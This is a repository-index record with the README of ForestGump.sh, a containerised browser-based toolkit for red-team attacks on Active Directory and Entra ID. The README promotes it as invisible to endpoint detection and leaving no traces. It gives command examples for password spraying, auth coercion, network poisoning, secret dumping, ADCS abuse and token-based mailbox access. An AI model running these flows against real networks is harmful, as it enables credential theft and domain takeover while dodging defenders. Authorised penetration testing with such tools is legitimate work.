{"id":51952292,"url":"https://github.com/benjitrapp/forestgump.sh","last_synced_at":"2026-07-29T07:00:59.075Z","repository":{"id":362042737,"uuid":"1257010777","full_name":"BenjiTrapp/ForestGump.sh","owner":"BenjiTrapp","description":"ForestGump.sh is a lightweight, helper that runs through your filesystem like Forrest through Alabama — scanning, mapping, or processing directories before you can say “Run, Forrest, run!”  Think of it as a box of pralines: you never know which directory surprise you’ll get, but it’s always sweet, always structured, and never melts under pressure.","archived":false,"fork":false,"pushed_at":"2026-06-20T12:21:33.000Z","size":3519,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-06-20T14:25:12.243Z","etag":null,"topics":["docker","docker-image","kubernetes-deployment","pentesting","redteam-tools","redteaming"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BenjiTrapp.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2026-06-02T09:29:31.000Z","updated_at":"2026-06-20T12:21:36.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/BenjiTrapp/ForestGump.sh","commit_stats":null,"previous_names":["benjitrapp/forestgump.sh"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/BenjiTrapp/ForestGump.sh","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BenjiTrapp%2FForestGump.sh","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BenjiTrapp%2FForestGump.sh/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BenjiTrapp%2FForestGump.sh/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BenjiTrapp%2FForestGump.sh/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BenjiTrapp","download_url":"https://codeload.github.com/BenjiTrapp/ForestGump.sh/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BenjiTrapp%2FForestGump.sh/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36022278,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-07-29T02:00:04.910Z","response_time":95,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["docker","docker-image","kubernetes-deployment","pentesting","redteam-tools","redteaming"],"created_at":"2026-07-29T07:00:58.085Z","updated_at":"2026-07-29T07:00:59.052Z","avatar_url":"https://github.com/BenjiTrapp.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n    \u003cimg src=\"static/hi_forest_gump.gif\" alt=\"Forest Gump waving\" width=\"360\" /\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"static/logo.png\" alt=\"ForestGump.sh\" width=\"400\" /\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n    \u003cstrong\u003eThe AD \u0026 Entra ID Attack Platform That Runs in Your Browser\u003c/strong\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n    \u003ccode\u003econtainerized\u003c/code\u003e · \u003ccode\u003ebrowser-based\u003c/code\u003e · \u003ccode\u003eEDR-invisible\u003c/code\u003e · \u003ccode\u003eready to roll\u003c/code\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n    \u003ca href=\"#quick-start\"\u003e\u003cimg src=\"https://img.shields.io/badge/-Quick_Start-black?style=for-the-badge\" alt=\"Quick Start\" /\u003e\u003c/a\u003e\n    \u003ca href=\"#arsenal\"\u003e\u003cimg src=\"https://img.shields.io/badge/-Arsenal-black?style=for-the-badge\" alt=\"Arsenal\" /\u003e\u003c/a\u003e\n    \u003ca href=\"#rdp--vnc-in-the-browser\"\u003e\u003cimg src=\"https://img.shields.io/badge/-RDP_in_Browser-black?style=for-the-badge\" alt=\"RDP in Browser\" /\u003e\u003c/a\u003e\n    \u003ca href=\"#kubernetes-deployment\"\u003e\u003cimg src=\"https://img.shields.io/badge/-K8s_Deploy-black?style=for-the-badge\" alt=\"Kubernetes\" /\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n---\n\n\u003e *\"Mama always said: AD pentesting tools are like a box of chocolates — you never know what you're gonna get.\"*\n\u003e\n\u003e But with ForestGump.sh, you get **all of them**. In a browser. In a container.\n\n---\n\n## The Paper Bag Theory\n\nWhen an EDR like CrowdStrike or SentinelOne is sitting on the target, running impacket from your laptop is like chugging whiskey in the checkout aisle — you're gonna get caught.\n\nBut wrap it in a container? **That's the paper bag.**\n\nThe EDR sees ttyd, a friendly little web terminal. It doesn't see the Responder, the secretsdump, the ntlmrelayx hiding inside. You just look like a guy buying groceries.\n\n**Single Docker image. 50+ offensive tools. Zero disk footprint.** Fire up a browser and you're in. Run from anywhere. Leave no agent on disk. And if you mess up? Just like that, it's like stepping off a bus — you don't even look back.\n\n---\n\n## Demo\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"static/browser_tty.png\" alt=\"ForestGump.sh browser terminal demo\" width=\"980\" /\u003e\n\u003c/p\u003e\n\n\u003ctable\u003e\n\u003ctr\u003e\n\u003ctd width=\"33%\"\u003e\u003cstrong\u003eInstant Access\u003c/strong\u003e\u003cbr/\u003eLaunch AD \u0026 Entra recon tools the second the container starts\u003c/td\u003e\n\u003ctd width=\"33%\"\u003e\u003cstrong\u003eDisposable\u003c/strong\u003e\u003cbr/\u003eEphemeral container — kill it and every trace vanishes\u003c/td\u003e\n\u003ctd width=\"33%\"\u003e\u003cstrong\u003ePortable\u003c/strong\u003e\u003cbr/\u003eWorks from any machine with a browser at \u003ccode\u003elocalhost:7681\u003c/code\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/table\u003e\n\n---\n\n## Quick Start\n\n```bash\n# One command to rule them all\nmake build \u0026\u0026 make run\n```\n\nThen open **http://localhost:7681** in your browser. That's it. You're in.\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cstrong\u003eOther run modes\u003c/strong\u003e\u003c/summary\u003e\n\n```bash\n# Bridge networking (Docker Desktop on Windows/Mac)\nmake run-windows\n\n# Host networking (native Linux — all ports, raw sockets)\nmake run-linux\n\n# Use the prebuilt GHCR image (no build required)\nmake ghcr          # Docker Desktop\nmake ghcr-linux    # Native Linux\n\n# Interactive shell (bypass ttyd, go straight to bash)\nmake shell\n```\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cstrong\u003eGHCR one-liner (no clone needed)\u003c/strong\u003e\u003c/summary\u003e\n\n```bash\ndocker run -it --rm --name forestgump \\\n  -p 7681:7681 -p 6080:6080 -p 5000:5000 \\\n  --cap-add=NET_ADMIN --cap-add=SYS_ADMIN \\\n  ghcr.io/benjitrapp/forestgump.sh:latest\n```\n\nFor Mac Silicon (ARM):\n```bash\ndocker pull ghcr.io/benjitrapp/forestgump.sh:latest --platform linux/x86_64\n```\n\n\u003c/details\u003e\n\n---\n\n## Arsenal\n\n\u003e 50+ tools. Everything you need from initial recon to full domain compromise to cloud takeover.\n\n### On-Prem Active Directory\n\n\u003cdetails open\u003e\n\u003csummary\u003e\u003cstrong\u003eReconnaissance \u0026 Enumeration\u003c/strong\u003e\u003c/summary\u003e\n\n| Tool | What it does |\n|:-----|:-------------|\n| [BloodHound.py](https://github.com/dirkjanm/BloodHound.py) | BloodHound Python ingestor — map attack paths |\n| [NetExec (nxc)](https://github.com/Pennyw0rth/NetExec) | Network execution toolkit (SMB, LDAP, WinRM, MSSQL) |\n| [godap](https://github.com/Macmod/godap) | LDAP TUI explorer — browse AD like a filesystem |\n| [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) | Dump the entire domain via LDAP |\n| [ldapnomnom](https://github.com/lkarlslund/ldapnomnom) | Anonymous LDAP username bruteforce |\n| [ad-reaper](https://github.com/mermehr/ad-reaper) | Multi-protocol AD enumerator (LDAP, SMB, SAMR) |\n| [AdStrike](https://github.com/capture0x/AdStrike) | AI-powered modular AD red-team framework |\n| [GPOHunter](https://github.com/PShlyundin/GPOHunter) | GPO misconfiguration analyzer |\n| [gpoParser](https://github.com/synacktiv/gpoParser) | GPO extraction \u0026 analysis |\n| [snafflepy](https://github.com/cisagov/snafflepy) | Python Snaffler — sniff out interesting files on shares |\n| [snitch](https://github.com/karol-broda/snitch) | AD recon \u0026 enumeration |\n\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n\u003csummary\u003e\u003cstrong\u003eAuthentication Attacks \u0026 Relay\u003c/strong\u003e\u003c/summary\u003e\n\n| Tool | What it does |\n|:-----|:-------------|\n| [Responder](https://github.com/lgandx/Responder) | LLMNR/NBT-NS/MDNS poisoner — harvest creds off the wire |\n| [Impacket](https://github.com/fortra/impacket) | Swiss army knife of AD protocols (secretsdump, getTGT, ntlmrelayx, ...) |\n| [RelayKing-Depth](https://github.com/depthsecurity/RelayKing-Depth) | NTLM \u0026 Kerberos relay detection |\n| [Coercer](https://github.com/p0dalirius/Coercer) | Automatic Windows auth coercion |\n| [gopacket](https://github.com/mandiant/gopacket) | Go Impacket — 63 tools, 24 packages (Mandiant) |\n| [gontlm-proxy](https://github.com/bdwyertech/gontlm-proxy) | NTLM proxy forwarder |\n| [px](https://github.com/genotrance/px) | NTLM proxy (Python) |\n\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n\u003csummary\u003e\u003cstrong\u003ePrivilege Escalation \u0026 Exploitation\u003c/strong\u003e\u003c/summary\u003e\n\n| Tool | What it does |\n|:-----|:-------------|\n| [bloodyAD](https://github.com/CravateRouge/bloodyAD) | AD privilege escalation swiss army knife (LDAP/SAMR) |\n| [certipy-ad](https://github.com/ly4k/Certipy) | ADCS abuse toolkit — ESC1 through ESC13 |\n| [pySIDHistory](https://github.com/felixbillieres/pySIDHistory) | Remote SID History injection \u0026 auditing |\n| [getSPNless](https://github.com/jarnovandenbrink/getSPNless) | SPN-less RBCD attacks |\n| [DonPAPI](https://github.com/login-securite/DonPAPI) | Remote DPAPI credential dumper |\n| [mimikatz](https://github.com/gentilkiwi/mimikatz) | Windows credential extraction |\n| [Rubeus](https://github.com/GhostPack/Rubeus) | Kerberos abuse toolkit |\n| [ADCSCoercePotato](https://github.com/decoder-it/ADCSCoercePotato) | ADCS auth coercion |\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cstrong\u003eWindows Binaries \u0026 PowerShell (transfer to target)\u003c/strong\u003e\u003c/summary\u003e\n\n| Tool | Path |\n|:-----|:-----|\n| [mimikatz](https://github.com/gentilkiwi/mimikatz) | `/opt/tools/mimikatz/` |\n| [Rubeus](https://github.com/GhostPack/Rubeus) | `/opt/tools/Rubeus/` |\n| [KslKatz](https://github.com/vergamota/KslKatz) | `/opt/tools/KslKatz/` |\n| [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) | `/opt/tools/PowerSploit/` |\n| [SharpUp](https://github.com/GhostPack/SharpUp) | `/opt/tools/SharpUp/` |\n| [Recon-AD](https://github.com/outflanknl/Recon-AD) | `/opt/tools/Recon-AD/` |\n| [ADCSCoercePotato](https://github.com/decoder-it/ADCSCoercePotato) | `/opt/tools/ADCSCoercePotato/` |\n| [adPEAS](https://github.com/61106960/adPEAS) | `/opt/tools/adPEAS/` |\n| [AD-Ghost](https://github.com/LuemmelSec/AD-Ghost) | `/opt/tools/AD-Ghost/` |\n| [Invoke-PassTheCert](https://github.com/The-Viper-One/Invoke-PassTheCert) | `/opt/tools/Invoke-PassTheCert/` |\n\n\u003c/details\u003e\n\n---\n\n### Entra ID / Azure / M365\n\n\u003e From initial access to full cloud takeover — device codes, token abuse, email access, MFA bypass.\n\n| Tool | What it does |\n|:-----|:-------------|\n| [GraphSpy](https://github.com/RedByte1337/GraphSpy) | **Entra ID \u0026 M365 post-exploitation browser GUI** — tokens, device codes, PRT, MFA, Outlook, Teams, OneDrive (port 5000) |\n| [CredSpy](https://github.com/RedByte1337/CredSpy) | Entra ID user enumeration \u0026 auth method discovery via GetCredentialType API |\n| [o365creeper](https://github.com/RedByte1337/o365creeper) | O365 email address validation without login attempts |\n| [TokenTactics](https://github.com/rvrsh3ll/TokenTactics) | Azure JWT token manipulation — device code phishing, token switching (PowerShell) |\n| [ROADtools](https://github.com/dirkjanm/ROADtools) | Azure AD exploration framework (roadrecon + roadtx) |\n| [EntraFalcon](https://github.com/CompassSecurity/EntraFalcon) | Entra ID enumeration \u0026 risk assessment (PowerShell) |\n| [entra-ca-insight](https://github.com/emiliensocchi/entra-ca-insight) | Conditional Access gap analysis |\n| [TokenSmith](https://github.com/JumpsecLabs/TokenSmith) | Entra ID token generator (Go) |\n| [AzureRedOps](https://github.com/Mr-Un1k0d3r/AzureRedOps) | Azure/Entra ID red team PowerShell toolkit |\n| [GraphRobber](https://github.com/rabbit-sec/GraphRobber) | Microsoft Graph API permission abuse |\n| [Microsoft.Graph](https://github.com/microsoftgraph/msgraph-sdk-powershell) | Microsoft Graph PowerShell SDK |\n| [AzureAD](https://github.com/Azure/AzureAD) | AzureAD PowerShell module |\n\n---\n\n### Shells \u0026 Remote Access\n\n| Tool | What it does |\n|:-----|:-------------|\n| [Evil-WinRM](https://github.com/Hackplayers/evil-winrm) | WinRM shell (Ruby) |\n| [xfreerdp](https://github.com/FreeRDP/FreeRDP) | RDP client (headless-safe via xvfb) |\n| [rdp-browser](#rdp--vnc-in-the-browser) | Browser-accessible RDP via noVNC (port 6080) |\n| [tmux](https://github.com/tmux/tmux) | Terminal multiplexer |\n| [tightvncserver](https://github.com/TigerVNC/tigervnc) | VNC server |\n| [noVNC](https://github.com/novnc/noVNC) | Browser-based VNC client (port 6080) |\n| [pwsh](https://github.com/PowerShell/PowerShell) | PowerShell 7 |\n\n---\n\n## Usage Examples\n\n\u003cdetails open\u003e\n\u003csummary\u003e\u003cstrong\u003eOn-Prem AD Attack Flow\u003c/strong\u003e\u003c/summary\u003e\n\n```bash\n# Enumerate the domain\nbloodhound-python -d domain.local -u user -p Password123 -dc dc.domain.local -c all\n\n# Spray credentials across the network\nnxc smb 192.168.1.0/24 -u user -p Password123\n\n# Coerce authentication\ncoercer coerce -d domain.local -u user -p Password123 --dc-ip 192.168.1.10 -l attacker-ip\n\n# Poison the network\nresponder -I eth0 -wrf\n\n# Dump secrets\nimpacket-secretsdump domain.local/user:Password123@192.168.1.10\n\n# ADCS exploitation\ncertipy-ad find -u user@domain.local -p Password123 -dc-ip 192.168.1.10\n```\n\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n\u003csummary\u003e\u003cstrong\u003eEntra ID / Cloud Attack Flow\u003c/strong\u003e\u003c/summary\u003e\n\n```bash\n# Validate O365 email addresses (no login attempts)\no365creeper -f emails.txt -o valid.txt\n\n# Enumerate auth methods for valid users\ncredspy valid.txt --csv results.csv\n\n# Launch GraphSpy browser GUI for post-exploitation\ngraphspy\n# Open http://localhost:5000 — manage tokens, device codes, read emails, Teams, OneDrive\n\n# Azure JWT token manipulation (PowerShell)\npwsh -c \"Import-Module /opt/tools/TokenTactics/TokenTactics.psd1; Get-AzureToken -Client MSGraph\"\n\n# ROADtools exploration\nroadrecon auth -u user@target.com -p Password123\nroadrecon gather\nroadrecon gui\n```\n\n\u003c/details\u003e\n\n---\n\n## Ports \u0026 Services\n\n| Port | Service | Access | Purpose |\n|:----:|:--------|:-------|:--------|\n| `7681` | ttyd | **http://localhost:7681** | Web terminal (primary interface) |\n| `5000` | GraphSpy | **http://localhost:5000** | Entra ID/M365 post-exploitation GUI |\n| `6080` | noVNC | **http://localhost:6080/vnc.html** | Browser-accessible RDP desktop |\n| `5900` | x11vnc | internal | VNC (container only) |\n\n---\n\n## RDP \u0026 VNC in the Browser\n\nForestGump.sh gives you two ways to work with RDP sessions — both work inside the headless ttyd terminal without a physical X display.\n\n### xfreerdp (headless-safe)\n\nThe `xfreerdp` command is wrapped by `xvfb-run` when no display is available:\n\n```bash\nxfreerdp /v:192.168.1.100 /u:administrator /p:Password123 /cert:ignore\n```\n\n### Browser-accessible RDP via noVNC\n\nFor full visual RDP access, use `rdp-browser`:\n\n```\nXvfb --\u003e xfreerdp --\u003e x11vnc --\u003e websockify/noVNC --\u003e your browser\n```\n\n```bash\nrdp-browser /v:192.168.1.100 /u:administrator /p:Password123 /cert:ignore\n```\n\nOpen **http://localhost:6080/vnc.html** in a second browser tab.\n\n### Background session management\n\n```bash\nrdp-bg /v:192.168.1.100 /u:admin /p:Password123 /cert:ignore\n# Terminal is free — session runs in background\n\nrdp-ls          # List active sessions\nrdp-stop 1234   # Kill session by PID\n```\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cstrong\u003eEnvironment variables\u003c/strong\u003e\u003c/summary\u003e\n\n| Variable      | Default        | Description                          |\n|---------------|----------------|--------------------------------------|\n| `NOVNC_PORT`  | `6080`         | noVNC web interface port             |\n| `VNC_PORT`    | `5900`         | Internal VNC port                    |\n| `DISPLAY_NUM` | `99`           | Virtual X display number             |\n| `SCREEN_SIZE` | `1280x1024x24` | Virtual screen resolution \u0026 depth    |\n\n\u003c/details\u003e\n\n---\n\n## xfreerdp Demo Environment\n\nA self-contained demo environment validates headless RDP connectivity end-to-end:\n\n\u003cp align=\"center\"\u003e\n    \u003cimg src=\"assets/rdp-terminal-demo.gif\" alt=\"Headless xfreerdp session connecting to an xrdp target from Docker\" width=\"980\" /\u003e\n\u003c/p\u003e\n\n```mermaid\ngraph LR\n    subgraph adlab network\n        A[\u003cstrong\u003eforestgump\u003c/strong\u003e\u003cbr/\u003exfreerdp 2.11.5\u003cbr/\u003exvfb headless\u003cbr/\u003ettyd web shell\u003cbr/\u003e\u003cem\u003ePort: 7681\u003c/em\u003e]\n        B[\u003cstrong\u003erdp-target\u003c/strong\u003e\u003cbr/\u003eUbuntu 24.04\u003cbr/\u003exrdp\u003cbr/\u003eopenbox WM\u003cbr/\u003e\u003cem\u003ePort: 3389\u003c/em\u003e]\n    end\n    A -- \"RDP (3389)\" --\u003e B\n```\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cstrong\u003eRun the demo\u003c/strong\u003e\u003c/summary\u003e\n\n```bash\n# Build and launch both containers\ndocker compose -f docker-compose.demo.yml up -d --build\n\n# Wait for xrdp to initialize\nsleep 3\n\n# Run the validation\ndocker exec forestgump bash /opt/scripts/demo-xfreerdp.sh rdp-target demo demo\n\n# Dry-run (no target, validates toolchain only)\ndocker exec forestgump bash /opt/scripts/demo-xfreerdp.sh\n```\n\n| Check | What it proves |\n|-------|---------------|\n| xfreerdp binary | `freerdp2-x11` package is correctly installed |\n| Version output | xfreerdp executes inside the container via xvfb |\n| xvfb-run available | Headless X11 virtual framebuffer is present |\n| Live RDP connection | End-to-end RDP from forestgump to rdp-target works |\n\n**Demo credentials:** `demo` / `demo`\n\n**Cleanup:**\n```bash\ndocker compose -f docker-compose.demo.yml down\n```\n\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cstrong\u003eTroubleshooting\u003c/strong\u003e\u003c/summary\u003e\n\n- **xrdp not listening** — wait a few seconds after container start; xrdp-sesman needs time to initialize.\n- **\"Xvfb failed to start\"** — a stale lock file may exist. The `--auto-servernum` flag avoids this. If it persists, restart the container.\n- **Connection refused** — ensure both containers are on the same network (`docker network ls` should show `forestgumpsh_adlab`).\n\n\u003c/details\u003e\n\n---\n\n## Network \u0026 Capabilities\n\nThe container optionally uses `--net=host` to share the host network stack — necessary for tools like Responder, Coercer, and nxc that need raw socket access.\n\n| Capability | Why |\n|:-----------|:----|\n| `NET_ADMIN` | Packet crafting, network manipulation |\n| `SYS_ADMIN` | Raw sockets (Responder, relay tools) |\n\n---\n\n## Kubernetes Deployment\n\n```bash\nkubectl apply -f https://raw.githubusercontent.com/benjitrapp/forestgump.sh/main/deploy/forestgump.yaml\n```\n\n\u003cdetails\u003e\n\u003csummary\u003e\u003cstrong\u003eManual manifests\u003c/strong\u003e\u003c/summary\u003e\n\n**Pod:**\n```yaml\napiVersion: v1\nkind: Pod\nmetadata:\n  name: forestgump-pod\n  labels:\n    app: forestgump\nspec:\n  containers:\n  - name: forestgump-pod\n    image: ghcr.io/benjitrapp/forestgump.sh:latest\n    ports:\n    - containerPort: 7681\n    - containerPort: 5000\n    securityContext:\n      readOnlyRootFilesystem: true\n```\n\n**Service:**\n```yaml\napiVersion: v1\nkind: Service\nmetadata:\n  name: forestgump-svc\n  labels:\n    app: forestgump\nspec:\n  type: ClusterIP\n  ports:\n  - port: 7681\n    protocol: TCP\n    name: ttyd\n  - port: 5000\n    protocol: TCP\n    name: graphspy\n  selector:\n    app: forestgump\n```\n\n**Access:**\n```bash\nkubectl port-forward forestgump-pod 7681:7681 5000:5000\n```\n\nOpen **http://localhost:7681** (terminal) and **http://localhost:5000** (GraphSpy).\n\n\u003c/details\u003e\n\n---\n\n## Project Structure\n\n```\nForestGump.sh/\n├── Dockerfile                   # Single-stage build, ttyd base image\n├── Makefile                     # build / run / ghcr / shell targets\n├── install.sh                   # Tool installation (runs during docker build)\n├── docker-compose.demo.yml      # Demo: forestgump + rdp-target\n│\n├── scripts/\n│   ├── entrypoint.sh            # Container startup + tool banner\n│   ├── shell.sh                 # Shell launcher (sources tools.sh)\n│   ├── tools.sh                 # PATH, aliases, help() function\n│   ├── bashrc_custom            # rdp-bg, rdp-stop, rdp-ls helpers\n│   ├── xfreerdp.sh             # Headless-safe xfreerdp wrapper\n│   ├── rdp-browser.sh          # noVNC RDP pipeline\n│   ├── demo-xfreerdp.sh        # Validation script (4 checks)\n│   └── demo-record-terminal.sh # GIF recording helper\n│\n├── deploy/\n│   ├── forestgump.yaml          # Kubernetes manifest\n│   └── rdp-target/Dockerfile    # Demo RDP target (Ubuntu + xrdp)\n│\n├── static/                      # Logo, GIFs, screenshots\n└── assets/                      # Demo recordings\n```\n\n---\n\n\u003cp align=\"center\"\u003e\n    \u003cem\u003e\"I may not be a smart man, but I know what domain admin is.\"\u003c/em\u003e\n\u003c/p\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbenjitrapp%2Fforestgump.sh","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbenjitrapp%2Fforestgump.sh","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbenjitrapp%2Fforestgump.sh/lists"}